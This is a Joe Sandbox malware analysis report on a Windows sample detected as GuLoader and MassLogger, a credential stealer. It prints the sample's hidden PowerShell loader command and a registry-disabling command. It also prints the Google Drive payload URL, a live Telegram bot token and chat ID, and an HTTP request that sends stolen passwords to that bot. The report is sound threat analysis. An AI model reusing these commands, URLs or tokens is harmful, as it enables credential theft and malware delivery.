Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dP5z8RpEyQ.exe

Overview

General Information

Sample name:dP5z8RpEyQ.exe
renamed because original name is a hash value
Original sample name:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1.exe
Analysis ID:1576692
MD5:307b33a50dcda8511f357c5de9da6b02
SHA1:ea0cd2a9546e4634ebd3cfe37fd73f5a8aabd0b8
SHA256:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disables CMD prompt
Disables the Windows registry editor (regedit)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • dP5z8RpEyQ.exe (PID: 2076 cmdline: "C:\Users\user\Desktop\dP5z8RpEyQ.exe" MD5: 307B33A50DCDA8511F357C5DE9DA6B02)
    • powershell.exe (PID: 2780 cmdline: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • reg.exe (PID: 616 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: msiexec.exe PID: 5064JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5064, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49813
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", CommandLine: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dP5z8RpEyQ.exe", ParentImage: C:\Users\user\Desktop\dP5z8RpEyQ.exe, ParentProcessId: 2076, ParentProcessName: dP5z8RpEyQ.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ", ProcessId: 2780, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T12:06:29.129790+010020577441Malware Command and Control Activity Detected192.168.2.549867149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T12:06:20.639801+010028032742Potentially Bad Traffic192.168.2.549834193.122.130.080TCP
            2024-12-17T12:06:26.702351+010028032742Potentially Bad Traffic192.168.2.549834193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T12:06:06.476206+010028032702Potentially Bad Traffic192.168.2.549813172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs", "Telegram Chatid": "7382809095"}
            Source: msiexec.exe.5064.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendMessage"}
            Source: dP5z8RpEyQ.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: dP5z8RpEyQ.exeJoe Sandbox ML: detected
            Source: dP5z8RpEyQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49867 version: TLS 1.2
            Source: dP5z8RpEyQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C83000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2632708521.0000000007C58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbd source: powershell.exe, 00000002.00000002.2638277451.0000000008D52000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0327B319h6_2_0327B068
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0327BBB8h6_2_0327B7A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0327BBB8h6_2_0327B790
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0327FA20h6_2_0327F600
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0327BBB8h6_2_0327BAE6

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49867 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: POST /bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e60f09a017aHost: api.telegram.orgContent-Length: 1077Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49834 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49813 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e60f09a017aHost: api.telegram.orgContent-Length: 1077Connection: Keep-Alive
            Source: msiexec.exe, 00000006.00000002.3296654914.0000000023781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: msiexec.exe, 00000006.00000002.3296654914.0000000023663000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000002.00000002.2621900945.0000000003359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft5or
            Source: dP5z8RpEyQ.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: dP5z8RpEyQ.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
            Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.3295702142.0000000022C00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ
            Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ%
            Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJG
            Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJU
            Source: msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJc
            Source: msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:
            Source: msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/?
            Source: msiexec.exe, 00000006.00000002.3284691137.00000000079E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.00000000079CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download
            Source: powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49867 version: TLS 1.2
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Windows\SuperpraisedJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Windows\Superpraised\haanlatterensJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Windows\SysWOW64\narrowness.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F3E2602_2_04F3E260
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_032743386_2_03274338
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0327B0686_2_0327B068
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03279FB06_2_03279FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0327A9556_2_0327A955
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03272DD16_2_03272DD1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0327B0576_2_0327B057
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0327F6006_2_0327F600
            Source: dP5z8RpEyQ.exeStatic PE information: invalid certificate
            Source: dP5z8RpEyQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/13@4/4
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045EA
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Users\user\AppData\Roaming\skittagetJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsk1B92.tmpJump to behavior
            Source: dP5z8RpEyQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 00000006.00000002.3297750938.000000002461D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236BE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236D2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236DF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000236AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
